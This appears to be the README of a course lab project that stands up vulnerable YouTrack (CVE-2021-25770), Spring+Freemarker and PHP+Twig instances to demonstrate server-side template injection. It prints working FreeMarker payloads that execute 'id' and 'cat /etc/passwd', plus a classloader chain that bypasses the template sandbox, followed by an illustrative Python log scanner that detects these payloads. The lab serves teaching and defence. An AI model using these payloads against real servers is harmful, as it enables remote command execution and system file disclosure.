This Docker project contains a case-study POC for CVE-2021-25770 in YouTrack, replica code on Spring + Freemarker, and replica code on PHP + Twig, to demonstrate the generalized concept of SSTI.
The project requires Vagrant v2.3.4 and VirtualBox v7.x installed; execute the following on an x86 environment:
$ git clone https://github.com/lamyongxian/cs5331-ssti.git
$ cd ./cs5331-ssti
$ vagrant up
- Youtrack Vulnerable*: http://192.168.56.10:8080/
- Youtrack Baseline*: http://192.168.56.10:8081/
- Spring + Freemarker: http://192.168.56.10:8082/
- PHP + Twig: http://192.168.56.10:8083/
*At this point, YouTrack requires a token to be entered during initial setup, which can be found at the following path within the Docker container:
/root/teamsysdata/conf/internal/services/configurationWizard/wizard_token.txt
(username: vagrant, password: vagrant)
To retrieve the YouTrack container's name:
$ sudo docker ps -a
Then use docker exec to attach to the respective Docker container:
$ sudo docker exec -it <Container ID> bash
# cat /root/teamsysdata/conf/internal/services/configurationWizard/wizard_token.txt
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("cat /etc/passwd")}
Using an underlying JDK/Spring weakness reachable through class.protectionDomain.classLoader (as in Spring4Shell) to bypass framework-level sandbox protection:
<#assign classloader=article.class.protectionDomain.classLoader>
<#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
<#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
<#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
${dwf.newInstance(ec,null)("id")}
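As an added example that is not part of this project, the following detection pass URL-decodes request log lines and flags the FreeMarker SSTI indicators used on this page (the ?new builtin, the Execute utility class, and the protectionDomain.classLoader chain). The rule set, rule names and sample log lines are constructed for illustration, not a vendor signature.

```python
import re
from urllib.parse import unquote_plus

# Indicators drawn from the FreeMarker payloads shown on this page.
# These regexes are an assumption for this example, not a vendor signature.
SSTI_RULES = {
    "fm_new_builtin": re.compile(r"\?\s*new\s*\(", re.I),
    "fm_execute_class": re.compile(r"freemarker\.template\.utility\.Execute", re.I),
    "fm_classloader_chain": re.compile(r"protectionDomain\s*\.\s*classLoader", re.I),
    "fm_loadclass": re.compile(r"\.loadClass\s*\(", re.I),
    "fm_assign_directive": re.compile(r"<#assign\b", re.I),
}

def normalise(raw: str) -> str:
    """URL-decode twice, since payloads are often double-encoded in query strings."""
    return unquote_plus(unquote_plus(raw))

def match_ssti(request_line: str) -> list[str]:
    """Return the names of every rule that fires on the decoded request line."""
    text = normalise(request_line)
    return [name for name, rx in SSTI_RULES.items() if rx.search(text)]

def scan_log(lines) -> list[tuple[int, list[str]]]:
    """Return (line number, matched rules) for each line hitting at least one rule."""
    hits = []
    for n, line in enumerate(lines, start=1):
        matched = match_ssti(line)
        if matched:
            hits.append((n, matched))
    return hits

# Constructed sample access-log lines (not real traffic): one benign search,
# the two page payloads URL-encoded into a POST query, and a benign line
# containing the word "new" to show the rules do not fire on ordinary text.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /issues?q=project%3A+demo HTTP/1.1" 200',
    '10.0.0.9 - - "POST /article?body=%3C%23assign+ex%3D%22freemarker.template.utility.Execute%22%3Fnew()%3E+%24%7Bex(%22id%22)%7D HTTP/1.1" 200',
    '10.0.0.9 - - "POST /article?body=%3C%23assign+classloader%3Darticle.class.protectionDomain.classLoader%3E HTTP/1.1" 200',
    '10.0.0.7 - - "GET /search?q=new+feature+(beta) HTTP/1.1" 200',
]

if __name__ == "__main__":
    for n, rules in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(rules)}")
```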